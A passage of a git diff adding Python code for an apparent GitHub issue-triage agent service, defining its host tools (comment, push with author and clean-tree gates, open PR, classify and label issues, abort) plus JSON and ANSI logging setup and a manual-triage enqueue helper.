f"comment posted: id={comment.id}" + + return host_tool( + name="gh_post_comment", + description=persona.host_tool_description("gh_post_comment"), + parameters={ + "type": "object", + "properties": { + "body": { + "type": "string", + "description": persona.host_tool_parameter_description("gh_post_comment", "body"), + }, + "number": { + "type": "integer", + "description": persona.host_tool_parameter_description("gh_post_comment", "number"), + }, + }, + "required": ["body"], + "additionalProperties": False, + }, + execute=execute, + ) + + +def _guarded_push_branch(bindings: ToolBindings, args: Mapping[str, Any], tool_name: str, branch: str) -> str: + if branch != bindings.workspace.branch: + _raise_command( + f"refusing to push: branch={branch!r} does not match workspace branch {bindings.workspace.branch!r}." + ) + # Re-pin the configured identity right before push (cheap; idempotent). + _run_repo_command(bindings, ["git", "config", "user.email", bindings.author_email]) + _run_repo_command(bindings, ["git", "config", "user.name", bindings.author_name]) + repo_dir_path = bindings.workspace.repo_dir + head_proc = _run_repo_command(bindings, ["git", "rev-parse", "HEAD"]) + if head_proc.returncode != 0: + err = (head_proc.stderr or head_proc.stdout).strip() or f"exit {head_proc.returncode}" + _audit(bindings, tool_name, args, error=err) + _raise_command(f"git rev-parse failed: {err}") + head_sha = head_proc.stdout.strip() + + # Identity gate: every commit between the base branch and HEAD must + # carry the configured author. Refuse to push otherwise so the agent + # fixes it (`git commit --amend --reset-author --no-edit`). + base = bindings.repo.default_branch + identities = _run_repo_command( + bindings, + ["git", "log", "--format=%H%x09%ae%x09%an", f"origin/{base}..HEAD"], + ) + if identities.returncode != 0: + err = (identities.stderr or identities.stdout).strip() + msg = f"refusing to push: could not inspect commit authors for origin/{base}..HEAD: {err}" + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + offending: list[str] = [] + for line in (identities.stdout or "").strip().splitlines(): + parts = line.split("\t") + if len(parts) < 3: + continue + sha, email, name = parts[0], parts[1], parts[2] + if email != bindings.author_email or name != bindings.author_name: + offending.append(f"{sha[:12]} {name} <{email}>") + if offending: + details = "\n ".join(offending) + msg = ( + "refusing to push: commit author identity mismatch. " + f"Expected `{bindings.author_name} <{bindings.author_email}>`. " + f"Offending commits:\n {details}\n" + "Amend each commit with `git commit --amend --reset-author --no-edit` " + "(or rebase with `git rebase -i origin/" + base + " --exec " + "'git commit --amend --reset-author --no-edit'`) and try again." + ) + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + + # Working-tree cleanliness gate. Any uncommitted change (edits the agent + # forgot to `git add && git commit`, files dropped by package managers, etc.) + # would silently land in the PR review delta but not in the commit history. + # Reject so the agent either commits or stashes them. + status = _run_repo_command(bindings, ["git", "status", "--porcelain", "--untracked-files=normal"]) + if status.stdout.strip(): + dirty = "\n ".join(status.stdout.strip().splitlines()) + msg = ( + "refusing to push: working tree is dirty.\n " + f"{dirty}\n" + "Commit (or `git stash`) every change before pushing — anything in the " + "worktree that isn't in a commit won't appear in the PR." + ) + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + + try: + result = bindings.git_transport.push_branch( + repo=bindings.repo.full_name, + workspace_key=workspace_key(bindings.repo.full_name, bindings.issue.number), + repo_dir=repo_dir_path, + branch=branch, + expected_head=head_sha, + slot_uid=bindings.slot_uid, + ) + except HeadDriftError: + msg = ( + "refusing to push: HEAD changed between preflight and push " + "(another commit landed; rerun the gate by re-issuing the push)." + ) + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + except GitCommandError as exc: + err = (exc.stderr or exc.stdout).strip() or f"exit {exc.returncode}" + _audit(bindings, tool_name, args, error=err) + _raise_command(f"git push failed: {err}") + except GitHubError as exc: + msg = f"gh-proxy rejected push: {exc.status} {exc.message}" + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + _share_git_metadata_with_slots(repo_dir_path, bindings.slot_uid) + _audit(bindings, tool_name, args, result={"head": result.head, "branch": result.branch}) + return result.head + + +# ---------- gh_push_branch ---------- +def _build_push_branch(bindings: ToolBindings) -> HostTool[Any, Any]: + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + branch = str(args.get("branch") or bindings.workspace.branch) + skip = bool(args.get("skip_checks", False)) + # Same gate as gh_open_pr — formatter + check before bytes leave the + # workstation, so CI doesn't blow up on a follow-up commit. The fix + # pass auto-commits any formatter diff so the push includes it. + # `skip_checks=true` bypasses the formatter/check (e.g. when `main` + # itself is broken); dirty-tree gate still runs unconditionally. + _run_pre_publish_bun_fix(bindings, args, tool_name="gh_push_branch", stage="push", skip_checks=skip) + _run_pre_publish_bun_check(bindings, args, tool_name="gh_push_branch", stage="push", skip_checks=skip) + head = _guarded_push_branch(bindings, args, "gh_push_branch", branch) + suffix = " (pre-push checks skipped)" if skip else "" + return f"pushed {branch} at {head[:12]} as {bindings.author_name} <{bindings.author_email}>{suffix}" + + return host_tool( + name="gh_push_branch", + description=persona.host_tool_description("gh_push_branch"), + parameters={ + "type": "object", + "properties": { + "branch": { + "type": "string", + "description": persona.host_tool_parameter_description("gh_push_branch", "branch"), + }, + "skip_checks": { + "type": "boolean", + "description": persona.host_tool_parameter_description("gh_push_branch", "skip_checks"), + }, + }, + "additionalProperties": False, + }, + execute=execute, + ) + + +# ---------- gh_open_pr ---------- +def _build_open_pr(bindings: ToolBindings) -> HostTool[Any, Any]: + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + title = args.get("title") + body = args.get("body") + if not isinstance(title, str) or not title.strip(): + _raise_command("gh_open_pr requires a non-empty 'title'.") + if not isinstance(body, str) or not body.strip(): + _raise_command("gh_open_pr requires a non-empty 'body'.") + for required in ("## Repro", "## Cause", "## Fix", "## Verification"): + if required not in body: + _raise_command( + f"PR body missing required section header {required!r}. " + "Follow the template in the system prompt verbatim." + ) + # Auto-close keyword. GitHub closes the linked issue on merge only when + # one of `Fixes / Closes / Resolves #<n>` is present in the PR body. + n = bindings.issue.number + accepted = [f"{kw} #{n}" for kw in ("Fixes", "Closes", "Resolves", "fixes", "closes", "resolves")] + if not any(form in body for form in accepted): + _raise_command( + f"PR body must include `Fixes #{n}` (or `Closes #{n}` / `Resolves #{n}`) so " + "GitHub auto-closes the issue when the PR merges. Put it at the end of the " + "Verification section per the template." + ) + skip = bool(args.get("skip_checks", False)) + _run_pre_publish_bun_fix(bindings, args, tool_name="gh_open_pr", stage="open PR", skip_checks=skip) + _run_pre_publish_bun_check(bindings, args, tool_name="gh_open_pr", stage="open PR", skip_checks=skip) + # Make sure the branch is pushed (idempotent) using the same preflight as gh_push_branch. + _guarded_push_branch(bindings, args, "gh_open_pr", bindings.workspace.branch) + base = args.get("base") or bindings.repo.default_branch + try: + pr = _run_coro( + bindings.loop, + bindings.github.open_pull_request( + repo=bindings.repo.full_name, + head=bindings.workspace.branch, + base=str(base), + title=title, + body=body, + draft=bool(args.get("draft", False)), + ), + ) + except GitHubError as exc: + _audit(bindings, "gh_open_pr", args, error=str(exc)) + _raise_command(f"GitHub rejected PR: {exc.status} {exc.message}") + bindings.db.set_issue_pr(bindings.issue_key, pr.number) + bindings.db.set_issue_state(bindings.issue_key, "opened") + artifact = bindings.workspace.artifacts_dir / "pr.json" + artifact.write_text( + json.dumps( + { + "repo": pr.repo, + "number": pr.number, + "url": pr.html_url, + "head": pr.head_ref, + "base": pr.base_ref, + }, + indent=2, + ), + encoding="utf-8", + ) + _audit(bindings, "gh_open_pr", args, result={"pr_number": pr.number, "url": pr.html_url}) + return f"opened #{pr.number}: {pr.html_url}" + + return host_tool( + name="gh_open_pr", + description=persona.host_tool_description("gh_open_pr"), + parameters={ + "type": "object", + "properties": { + "title": {"type": "string"}, + "body": { + "type": "string", + "description": persona.host_tool_parameter_description("gh_open_pr", "body"), + }, + "base": { + "type": "string", + "description": persona.host_tool_parameter_description("gh_open_pr", "base"), + }, + "draft": {"type": "boolean", "default": False}, + "skip_checks": { + "type": "boolean", + "description": persona.host_tool_parameter_description("gh_open_pr", "skip_checks"), + }, + }, + "required": ["title", "body"], + "additionalProperties": False, + }, + execute=execute, + ) + + +# ---------- gh_request_review ---------- +def _build_request_review(bindings: ToolBindings) -> HostTool[Any, Any]: + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + reviewers = args.get("reviewers") or [] + assignees = args.get("assignees") or [] + if not isinstance(reviewers, list) or not isinstance(assignees, list): + _raise_command("gh_request_review expects 'reviewers' and 'assignees' to be arrays of logins.") + issue_row = bindings.db.get_issue(bindings.issue_key) + pr_number = issue_row.pr_number if issue_row else None + if pr_number is None: + _raise_command("no PR recorded for this issue yet; call gh_open_pr first.") + try: + if reviewers: + _run_coro( + bindings.loop, + bindings.github.request_reviewers( + repo=bindings.repo.full_name, + pr_number=pr_number, + reviewers=[str(r) for r in reviewers], + ), + ) + if assignees: + _run_coro( + bindings.loop, + bindings.github.add_assignees( + bindings.repo.full_name, + pr_number, + [str(a) for a in assignees], + ), + ) + except GitHubError as exc: + _audit(bindings, "gh_request_review", args, error=str(exc)) + _raise_command(f"GitHub rejected review request: {exc.status} {exc.message}") + _audit(bindings, "gh_request_review", args, result={"pr": pr_number}) + return f"updated review/assignees on #{pr_number}" + + return host_tool( + name="gh_request_review", + description=persona.host_tool_description("gh_request_review"), + parameters={ + "type": "object", + "properties": { + "reviewers": {"type": "array", "items": {"type": "string"}}, + "assignees": {"type": "array", "items": {"type": "string"}}, + }, + "additionalProperties": False, + }, + execute=execute, + ) + + +# ---------- repro_record ---------- +def _build_repro_record(bindings: ToolBindings) -> HostTool[Any, Any]: + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + title = args.get("title") + command = args.get("command") + output = args.get("output") + exit_code = args.get("exit_code") + if not isinstance(title, str) or not title.strip(): + _raise_command("repro_record requires a non-empty 'title'.") + if not isinstance(command, str) or not command.strip(): + _raise_command("repro_record requires a non-empty 'command'.") + if not isinstance(output, str): + _raise_command("repro_record requires 'output' (may be empty string).") + if not isinstance(exit_code, int): + _raise_command("repro_record requires an integer 'exit_code'.") + bindings.workspace.repro_dir.mkdir(parents=True, exist_ok=True) + slug = "".join(c if c.isalnum() else "-" for c in title.lower()).strip("-")[:48] or "repro" + ts = int(time.time()) + target = bindings.workspace.repro_dir / f"{ts}-{slug}.md" + target.write_text( + f"# {title}\n\n" + f"- exit_code: {exit_code}\n" + f"- command:\n\n```\n{command}\n```\n\n" + f"## Output\n\n```\n{output}\n```\n", + encoding="utf-8", + ) + # Single-ownership invariant: workspace files belong to the active + # slot. The orchestrator (root) wrote this file directly, so hand it + # over before the audit row lands so the agent can edit/delete it. + if _slot_permissions_active(bindings.slot_uid): + assert bindings.slot_uid is not None + os.chown(target, bindings.slot_uid, bindings.slot_uid) + _audit(bindings, "repro_record", args, result={"path": str(target.relative_to(bindings.workspace.root))}) + return "recorded" + + return host_tool( + name="repro_record", + description=persona.host_tool_description("repro_record"), + parameters={ + "type": "object", + "properties": { + "title": {"type": "string"}, + "command": {"type": "string"}, + "output": {"type": "string"}, + "exit_code": {"type": "integer"}, + "reproduced": { + "type": "boolean", + "description": persona.host_tool_parameter_description("repro_record", "reproduced"), + }, + }, + "required": ["title", "command", "output", "exit_code"], + "additionalProperties": False, + }, + execute=execute, + ) + + +# ---------- mark_unable_to_reproduce ---------- +def _build_mark_unable(bindings: ToolBindings) -> HostTool[Any, Any]: + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + diagnosis = args.get("diagnosis") + needed = args.get("info_needed") + if not isinstance(diagnosis, str) or not diagnosis.strip(): + _raise_command("mark_unable_to_reproduce requires a 'diagnosis'.") + if not isinstance(needed, str) or not needed.strip(): + _raise_command("mark_unable_to_reproduce requires 'info_needed' explaining what to ask for.") + body = persona.unable_to_reproduce_comment( + diagnosis=diagnosis, + info_needed=needed, + ) + try: + comment = _run_coro( + bindings.loop, + bindings.github.post_comment(bindings.repo.full_name, bindings.issue.number, body), + ) + except GitHubError as exc: + _audit(bindings, "mark_unable_to_reproduce", args, error=str(exc)) + _raise_command(f"GitHub rejected comment: {exc.status} {exc.message}") + bindings.db.set_issue_state(bindings.issue_key, "abandoned") + _audit(bindings, "mark_unable_to_reproduce", args, result={"comment_id": comment.id}) + return f"posted abandonment comment id={comment.id}" + + return host_tool( + name="mark_unable_to_reproduce", + description=persona.host_tool_description("mark_unable_to_reproduce"), + parameters={ + "type": "object", + "properties": { + "diagnosis": {"type": "string"}, + "info_needed": {"type": "string"}, + }, + "required": ["diagnosis", "info_needed"], + "additionalProperties": False, + }, + execute=execute, + ) + + +# ---------- abort_task ---------- +def _build_abort_task(bindings: ToolBindings) -> HostTool[Any, Any]: + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + reason = args.get("reason") + if not isinstance(reason, str) or not reason.strip(): + _raise_command("abort_task requires a non-empty 'reason' string.") + reason = reason.strip() + # Audit FIRST so the diagnosis is durable even if anything below + # races against the imminent omp teardown. + _audit(bindings, "abort_task", args, result={"reason": reason}) + log.warning( + "task_aborted", + extra={"issue": bindings.issue_key, "reason": reason}, + ) + bindings.db.set_issue_state(bindings.issue_key, "abandoned") + if bindings.abort is not None: + bindings.abort.signal(reason) + return "aborted" + + return host_tool( + name="abort_task", + description=persona.host_tool_description("abort_task"), + parameters={ + "type": "object", + "properties": { + "reason": {"type": "string"}, + }, + "required": ["reason"], + "additionalProperties": False, + }, + execute=execute, + ) + + +# ---------- fetch_issue_thread ---------- +def _build_fetch_thread(bindings: ToolBindings) -> HostTool[Any, Any]: + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + try: + issue = _run_coro( + bindings.loop, + bindings.github.get_issue(bindings.repo.full_name, bindings.issue.number), + ) + comments = _run_coro( + bindings.loop, + bindings.github.list_comments(bindings.repo.full_name, bindings.issue.number), + ) + except GitHubError as exc: + _audit(bindings, "fetch_issue_thread", args, error=str(exc)) + _raise_command(f"GitHub fetch failed: {exc.status} {exc.message}") + lines = [ + f"# {issue.repo}#{issue.number} ({issue.state})", + f"title: {issue.title}", + f"author: @{issue.author}", + f"labels: {', '.join(issue.labels) if issue.labels else '(none)'}", + "", + "## Body", + issue.body.strip() or "(empty)", + "", + f"## Comments ({len(comments)})", + ] + for c in comments: + lines.extend(["", f"### @{c.author} at {c.created_at}", c.body.strip()]) + rendered = "\n".join(lines) + _audit(bindings, "fetch_issue_thread", args, result={"comments": len(comments)}) + return rendered + + return host_tool( + name="fetch_issue_thread", + description=persona.host_tool_description("fetch_issue_thread"), + parameters={ + "type": "object", + "properties": {}, + "additionalProperties": False, + }, + execute=execute, + ) + + +_PRIMARY_TYPES = ("bug", "enhancement", "question", "proposal", "documentation", "invalid", "duplicate") +_PRIORITIES = ("prio:p0", "prio:p1", "prio:p2", "prio:p3") +_FUNCTIONAL = ("agent", "tool", "tui", "cli", "prompting", "sdk", "auth", "setup", "ux", "providers") +_PLATFORMS = ("platform:linux", "platform:macos", "platform:windows", "platform:wsl") + + +def _build_set_issue_labels(bindings: ToolBindings) -> HostTool[Any, Any]: + """Append labels to the originating issue (or PR).""" + + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + if bindings.inbound_is_pr: + _audit(bindings, "set_issue_labels", args, result={"skipped": "pr_thread"}) + return ( + "no-op: set_issue_labels is not applicable on PR threads — PR labels are " + "not used for triage. Proceed with the requested change." + ) + labels = args.get("labels") + if not isinstance(labels, list) or not labels: + _raise_command("set_issue_labels requires a non-empty 'labels' array.") + cleaned = [str(lbl).strip() for lbl in labels if isinstance(lbl, str) and lbl.strip()] + if not cleaned: + _raise_command("set_issue_labels requires at least one non-empty label.") + target_number = bindings.issue.number + if isinstance(args.get("number"), int): + target_number = int(args["number"]) + try: + applied = _run_coro( + bindings.loop, + bindings.github.add_issue_labels(bindings.repo.full_name, target_number, cleaned), + ) + except GitHubError as exc: + _audit(bindings, "set_issue_labels", args, error=str(exc)) + _raise_command(f"GitHub rejected labels: {exc.status} {exc.message}") + _audit(bindings, "set_issue_labels", args, result={"labels": list(applied)}) + return f"labels now: {', '.join(applied)}" + + return host_tool( + name="set_issue_labels", + description=persona.host_tool_description("set_issue_labels"), + parameters={ + "type": "object", + "properties": { + "labels": {"type": "array", "items": {"type": "string"}}, + "number": { + "type": "integer", + "description": persona.host_tool_parameter_description("set_issue_labels", "number"), + }, + }, + "required": ["labels"], + "additionalProperties": False, + }, + execute=execute, + ) + + +def _build_classify_issue(bindings: ToolBindings) -> HostTool[Any, Any]: + """Triage step. Pick a primary type, optional priority/functional/provider/platform, + apply labels on GitHub, persist the primary type in sqlite, and signal which workflow + branch the agent should follow.""" + + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + existing = bindings.db.get_issue(bindings.issue_key) + if bindings.inbound_is_pr: + note = ( + f"no-op: classify_issue is not applicable on PR threads. " + f"Issue #{bindings.issue.number} is already classified" + ) + if existing is not None and existing.classification: + note += f" as {existing.classification!r}" + note += ". Proceed with the requested change (amend the branch and push, or post a comment)." + _audit(bindings, "classify_issue", args, result={"skipped": "pr_thread"}) + return note + if existing is not None and existing.classification: + _audit(bindings, "classify_issue", args, result={"skipped": "already_classified"}) + return ( + f"no-op: issue #{bindings.issue.number} is already classified as " + f"{existing.classification!r}. Continue with that workflow; do not re-classify." + ) + primary = args.get("primary") + if primary not in _PRIMARY_TYPES: + msg = f"classify_issue 'primary' must be one of {_PRIMARY_TYPES}; got {primary!r}." + _audit(bindings, "classify_issue", args, error=msg) + _raise_command(msg) + rationale = args.get("rationale") + if not isinstance(rationale, str) or not rationale.strip(): + msg = "classify_issue requires a one-sentence 'rationale'." + _audit(bindings, "classify_issue", args, error=msg) + _raise_command(msg) + priority = args.get("priority") + if primary == "bug": + if priority not in _PRIORITIES: + msg = f"classify_issue requires 'priority' in {_PRIORITIES} when primary=='bug'." + _audit(bindings, "classify_issue", args, error=msg) + _raise_command(msg) + else: + # Non-bug primaries: silently drop any priority the model included + # rather than rejecting the call. Some models (notably gpt-5.5 over + # OpenAI Completions) treat every property as required and loop + # forever when a non-empty optional value triggers a hard error. + priority = None + branch_slug = args.get("branch_slug") + if isinstance(branch_slug, str) and branch_slug.strip(): + try: + branch_slug = validate_branch_slug(branch_slug) + except ValueError as exc: + msg = f"classify_issue rejected branch_slug: {exc}" + _audit(bindings, "classify_issue", args, error=msg) + _raise_command(msg) + else: + branch_slug = None + + labels: list[str] = [primary] + if primary == "bug" and isinstance(priority, str): + labels.append(priority) + for fn in args.get("functional") or (): + # Unknown functional tags are dropped silently — they aren't worth + # rejecting the whole classification over. + if isinstance(fn, str) and fn in _FUNCTIONAL: + labels.append(fn) + provider = args.get("provider") + if isinstance(provider, str) and provider.strip() and provider.startswith("provider:"): + labels.append("providers") + labels.append(provider) + platform = args.get("platform") + if isinstance(platform, str) and platform in _PLATFORMS: + labels.append(platform) + labels.append("triaged") + + try: + applied = _run_coro( + bindings.loop, + bindings.github.add_issue_labels( + bindings.repo.full_name, + bindings.issue.number, + labels, + ), + ) + except GitHubError as exc: + _audit(bindings, "classify_issue", args, error=str(exc)) + _raise_command(f"GitHub rejected labels: {exc.status} {exc.message}") + + bindings.db.set_issue_classification(bindings.issue_key, primary) + renamed_to: str | None = None + if branch_slug: + try: + renamed_to = rename_workspace_branch( + bindings.workspace, + branch_slug, + pr_number=existing.pr_number if existing is not None else None, + slot_uid=bindings.slot_uid, + ) + except ValueError as exc: + _audit(bindings, "classify_issue", args, error=str(exc)) + _raise_command(f"classify_issue rejected branch_slug: {exc}") + except GitCommandError as exc: + _audit(bindings, "classify_issue", args, error=str(exc)) + _raise_command(f"classify_issue could not rename branch: {exc}") + if renamed_to != bindings.workspace.branch: + # rename_workspace_branch already mutated workspace.branch on + # success; this branch is purely defensive — kept so a future + # refactor of that helper still surfaces the mismatch. + _raise_command("classify_issue internal: branch rename inconsistent.") + bindings.db.set_issue_branch(bindings.issue_key, renamed_to) + _audit( + bindings, + "classify_issue", + args, + result={ + "primary": primary, + "labels": list(applied), + "rationale": rationale, + "branch": renamed_to, + }, + ) + # Echo back the workflow the agent should now follow. The persona prompt + # already describes each branch; the tool result reminds it. + next_step = persona.classify_next_step(str(primary)) + suffix = f" Branch renamed to `{renamed_to}`." if renamed_to else "" + return f"classified as {primary}; labels applied: {', '.join(applied)}.{suffix} Next: {next_step}." + + return host_tool( + name="classify_issue", + description=persona.host_tool_description("classify_issue"), + parameters={ + "type": "object", + "properties": { + "primary": { + "type": "string", + "enum": list(_PRIMARY_TYPES), + "description": persona.host_tool_parameter_description("classify_issue", "primary"), + }, + "priority": { + "type": "string", + "enum": list(_PRIORITIES), + "description": persona.host_tool_parameter_description("classify_issue", "priority"), + }, + "functional": { + "type": "array", + "items": {"type": "string", "enum": list(_FUNCTIONAL)}, + "description": persona.host_tool_parameter_description("classify_issue", "functional"), + }, + "provider": { + "type": "string", + "description": persona.host_tool_parameter_description("classify_issue", "provider"), + }, + "platform": { + "type": "string", + "enum": list(_PLATFORMS), + "description": persona.host_tool_parameter_description("classify_issue", "platform"), + }, + "rationale": { + "type": "string", + "description": persona.host_tool_parameter_description("classify_issue", "rationale"), + }, + "branch_slug": { + "type": "string", + "description": persona.host_tool_parameter_description("classify_issue", "branch_slug"), + }, + }, + "required": ["primary", "rationale"], + "additionalProperties": False, + }, + execute=execute, + ) + + +def build(bindings: ToolBindings) -> tuple[HostTool[Any, Any], ...]: + """Return the full set of host tools bound to one task's context. + + The toolset is intentionally identical across all task kinds so the LLM + prompt cache stays warm across triage → follow-up → PR-conversation + transitions. Triage tools (`classify_issue`, `set_issue_labels`) enforce + their own scope at execution time — see the `inbound_is_pr` and + already-classified guards inside `_build_classify_issue` / + `_build_set_issue_labels`. + """ + return ( + _build_classify_issue(bindings), + _build_set_issue_labels(bindings), + _build_post_comment(bindings), + _build_push_branch(bindings), + _build_open_pr(bindings), + _build_request_review(bindings), + _build_repro_record(bindings), + _build_mark_unable(bindings), + _build_abort_task(bindings), + _build_fetch_thread(bindings), + ) + + +__all__ = ["AbortController", "ToolBindings", "build"] diff --git a/python/robomp/src/logging_config.py b/python/robomp/src/logging_config.py new file mode 100644 index 000000000..d450b6474 --- /dev/null +++ b/python/robomp/src/logging_config.py @@ -0,0 +1,179 @@ +"""Logging configuration for roboomp — JSON to file, pretty ANSI to stdout.""" + +from __future__ import annotations + +import json +import logging +import logging.handlers +import sys +import time +from pathlib import Path +from typing import Any + +_RESERVED = frozenset( + { + "args", + "asctime", + "created", + "exc_info", + "exc_text", + "filename", + "funcName", + "levelname", + "levelno", + "lineno", + "message", + "module", + "msecs", + "msg", + "name", + "pathname", + "process", + "processName", + "relativeCreated", + "stack_info", + "thread", + "threadName", + "taskName", + } +) + +# ── ANSI helpers ────────────────────────────────────────────────────────────── + +_RST = "\033[0m" +_DIM = "\033[2m" + +_LEVEL_COLOR: dict[str, str] = { + "DEBUG": "\033[34m", # blue + "INFO": "\033[32m", # green + "WARNING": "\033[33m", # yellow + "ERROR": "\033[31m", # red + "CRITICAL": "\033[1;31m", # bold red +} + +# Fields that uvicorn injects and that are not useful in pretty output. +_PRETTY_SKIP = _RESERVED | {"color_message", "color_levelname"} + + +class PrettyFormatter(logging.Formatter): + """Human-readable single-line formatter with ANSI colour. + + Output shape: + HH:MM:SS LEVEL logger.name message key=val key2=val2 + """ + + def format(self, record: logging.LogRecord) -> str: # noqa: A003 + ts = time.strftime("%H:%M:%S", time.gmtime(record.created)) + color = _LEVEL_COLOR.get(record.levelname, "") + level = f"{color}{record.levelname:<8}{_RST}" + # Strip the package prefix to save width; keeps uvicorn.*, httpx, etc. + name = record.name.removeprefix("robomp.") + logger_col = f"{_DIM}{name:<22}{_RST}" + msg = record.getMessage() + + extras: list[str] = [] + for key, val in record.__dict__.items(): + if key in _PRETTY_SKIP or key.startswith("_"): + continue + extras.append(f"{key}={val}") + + line = f"{_DIM}{ts}{_RST} {level} {logger_col} {msg}" + if extras: + line += f" {_DIM}{' '.join(extras)}{_RST}" + if record.exc_info: + line += "\n" + self.formatException(record.exc_info) + if record.stack_info: + line += "\n" + self.formatStack(record.stack_info) + return line + + +# ── JSON formatter (kept for file handler) ──────────────────────────────────── + + +class JsonFormatter(logging.Formatter): + def format(self, record: logging.LogRecord) -> str: # noqa: A003 + payload: dict[str, Any] = { + "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(record.created)), + "level": record.levelname, + "logger": record.name, + "msg": record.getMessage(), + } + if record.exc_info: + payload["exc"] = self.formatException(record.exc_info) + for key, value in record.__dict__.items(): + if key in _RESERVED or key.startswith("_"): + continue + try: + json.dumps(value, default=str) + payload[key] = value + except (TypeError, ValueError): + payload[key] = repr(value) + return json.dumps(payload, default=str) + + +# ── Setup ───────────────────────────────────────────────────────────────────── + +# Dashboard polls these endpoints every couple seconds; mute them in access logs. +_ACCESS_MUTE_PATHS = ("/api/status", "/api/logs", "/healthz", "/readyz") + + +class _MuteDashboardPolling(logging.Filter): + """Drop uvicorn.access lines for high-frequency dashboard polling.""" + + def filter(self, record: logging.LogRecord) -> bool: # noqa: A003 + args = record.args + # uvicorn.access format: '%s - "%s %s HTTP/%s" %d' + # args = (client_addr, method, full_path, http_version, status_code) + if isinstance(args, tuple) and len(args) >= 3: + method, path = args[1], args[2] + if method == "GET" and isinstance(path, str): + base = path.split("?", 1)[0] + if base in _ACCESS_MUTE_PATHS: + return False + return True + + +_INITIALIZED = False + + +def configure_logging(log_dir: Path | None = None, level: int = logging.INFO) -> None: + """Idempotently configure logging: pretty ANSI to stdout, JSON to file.""" + global _INITIALIZED + if _INITIALIZED: + return + root = logging.getLogger() + root.setLevel(level) + for handler in list(root.handlers): + root.removeHandler(handler) + + stream = logging.StreamHandler(sys.stdout) + stream.setFormatter(PrettyFormatter()) + root.addHandler(stream) + + if log_dir is not None: + log_dir.mkdir(parents=True, exist_ok=True) + file_handler = logging.handlers.RotatingFileHandler( + log_dir / "robomp.log.jsonl", + maxBytes=10 * 1024 * 1024, + backupCount=5, + encoding="utf-8", + ) + file_handler.setFormatter(JsonFormatter()) + root.addHandler(file_handler) + + logging.getLogger("httpx").setLevel(logging.WARNING) + logging.getLogger("httpcore").setLevel(logging.WARNING) + logging.getLogger("uvicorn.access").addFilter(_MuteDashboardPolling()) + _INITIALIZED = True + + +def reset_logging_for_tests() -> None: + global _INITIALIZED + _INITIALIZED = False + root = logging.getLogger() + for handler in list(root.handlers): + root.removeHandler(handler) + + +def get_logger(name: str) -> logging.Logger: + return logging.getLogger(name) diff --git a/python/robomp/src/manual_triage.py b/python/robomp/src/manual_triage.py new file mode 100644 index 000000000..08c9c425d --- /dev/null +++ b/python/robomp/src/manual_triage.py @@ -0,0 +1,158 @@ +"""Manually enqueue an issue as if a webhook arrived. + +Shared by the `robomp triage` CLI and the dashboard's POST /api/trigger. +""" + +from __future__ import annotations + +import asyncio +import re +import time +from typing import Any + +from robomp.db import INACTIVE_EVENT_STATES, Database, EventRow, issue_key +from robomp.github_backend import GitHubBackend + +_ISSUE_REF = re.compile(r"^(?P<owner>[^/\s]+)/(?P<repo>[^#\s]+)#(?P<number>\d+)$") + + +class InvalidIssueRef(ValueError): + """Raised when the user-supplied issue reference can't be parsed.""" + + +class ManualTriageError(ValueError): + """Raised when a live GitHub issue cannot be manually triaged.""" + + +class ManualTriageConflict(RuntimeError): + """Raised when a stable manual delivery id is already active.""" + + def __init__(self, delivery_id: str, state: str) -> None: + self.delivery_id = delivery_id + self.state = state + super().__init__(f"{delivery_id} is already {state}") + + +class ManualTriageTimeout(TimeoutError): + """Raised when a manual CLI waiter stops before terminal state.""" + + def __init__(self, delivery_id: str, state: str, timeout_seconds: float) -> None: + self.delivery_id = delivery_id + self.state = state + self.timeout_seconds = timeout_seconds + super().__init__(f"{delivery_id} did not reach a terminal state within {timeout_seconds:g}s (state={state})") + + +def parse_issue_ref(ref: str) -> tuple[str, int]: + """Parse `owner/repo#NN` into `("owner/repo", NN)`.""" + match = _ISSUE_REF.match(ref.strip()) + if match is None: + raise InvalidIssueRef(f"expected owner/repo#NN, got {ref!r}") + return f"{match.group('owner')}/{match.group('repo')}", int(match.group("number")) + + +def manual_delivery_id(repo_full: str, number: int) -> str: + """Stable delivery id for manually-triggered triage. Re-runs reuse it.""" + return f"manual-{repo_full.replace('/', '__')}-{number}" + + +async def build_issues_opened_payload(github: GitHubBackend, repo_full: str, number: int) -> dict[str, Any]: + """Fetch the issue + repo metadata and synthesize an `issues.opened` payload.""" + issue = await github.get_issue(repo_full, number) + if issue.is_pull_request: + raise ManualTriageError(f"{repo_full}#{number} is a pull request, not an issue") + repo = await github.get_repo(repo_full) + return { + "action": "opened", + "issue": { + "number": issue.number, + "title": issue.title, + "body": issue.body, + "state": issue.state, + "user": {"login": issue.author}, + "labels": [{"name": lbl} for lbl in issue.labels], + }, + "repository": { + "full_name": repo.full_name, + "default_branch": repo.default_branch, + "clone_url": repo.clone_url, + "private": repo.private, + }, + } + + +async def enqueue_manual_triage(*, db: Database, github: GitHubBackend, repo_full: str, number: int) -> str: + """Fetch the issue from GitHub and queue it for the worker pool. + + Returns the delivery_id. A row may already exist from a previous manual + triage; inactive rows are replaced so the fresh payload (and reset attempt + counter) wins. Active rows are left intact. + """ + delivery = manual_delivery_id(repo_full, number) + existing = db.get_event(delivery) + if existing is not None and existing.state in ("queued", "running"): + raise ManualTriageConflict(delivery, existing.state) + + payload = await build_issues_opened_payload(github, repo_full, number) + replaced = db.replace_event_if_state_in( + delivery_id=delivery, + event_type="issues", + repo=repo_full, + issue_key=issue_key(repo_full, number), + payload=payload, + state="queued", + allowed_existing_states=INACTIVE_EVENT_STATES, + ) + if not replaced: + current = db.get_event(delivery) + state = current.state if current is not None else "active" + raise ManualTriageConflict(delivery, state) + return delivery + + +_TERMINAL_STATES: tuple[str, ...] = ("done", "failed", "skipped") + + +async def await_terminal_state( + db: Database, + 